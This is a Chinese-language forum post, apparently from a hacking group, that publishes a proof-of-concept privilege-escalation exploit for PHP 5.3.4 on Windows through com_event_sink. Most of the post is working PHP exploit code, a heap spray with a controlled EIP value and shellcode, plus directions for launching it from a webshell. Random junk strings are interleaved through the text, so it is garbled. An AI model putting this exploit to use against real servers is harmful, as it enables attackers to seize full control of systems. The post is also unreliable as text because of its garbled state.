PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
( Z1 b. |) ?# i/ l
测试方法如下：cmd /c x:\php\php.exe x:\test.php

下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
' @: r8 ^0 s( c6 F7 Y: U& k这里是两个测试的截图：


: O  [- f/ R, [

" |( o/ \" v& ?! P
' f' x* M- o, N# E) r成功利用此漏洞的攻击者将获得系统的最高权限


; Z( ]% K+ @1 f9 f0 w  ]. A

! S6 _2 O# k% j/ [5 L2 l1 W5 a) u
关于漏洞分析稍后附上。一下是PoC代码：
1 y% D. l; q( M( p% f% Q
8 z5 t# X0 a# l# h# y# o) x- ~<?php
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
0 _- W' m+ k- o" i4 u4 c* ^//$eip ="\x44\x43\x42\x41";
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
2 ~/ Q% G6 T+ L, k7 M1 l7 x$deodrant="";
3 b1 o& ~0 ?7 {: n2 ?$ K$axespray = str_repeat($eip.$eax,0x80);
//048d0190
echo strlen($axespray);
& q2 h. R  X/ A1 ]3 S- {# `echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
1 l& F. U! V5 [  Q% F! Vecho "Silic Group Hacker Army - BlackBap.Org";
" K$ K+ z' H# K% i- q//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$terminate = "T";
* w' t, ]' m4 M, u0 X$u[] =$deodrant;
, z' Y2 C9 q. S% _# T$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
) w7 q+ L0 H  B7 m" A) a//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
$vVar = new VARIANT(0x048d0000+180);
//弹窗代码(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$var2 = new VARIANT(0x41414242);
7 e) h" k  s) R: ?% n+ M/ I5 scom_event_sink($vVar,$var2,$buffer);
( N1 n6 _% a, ?! R3 f?>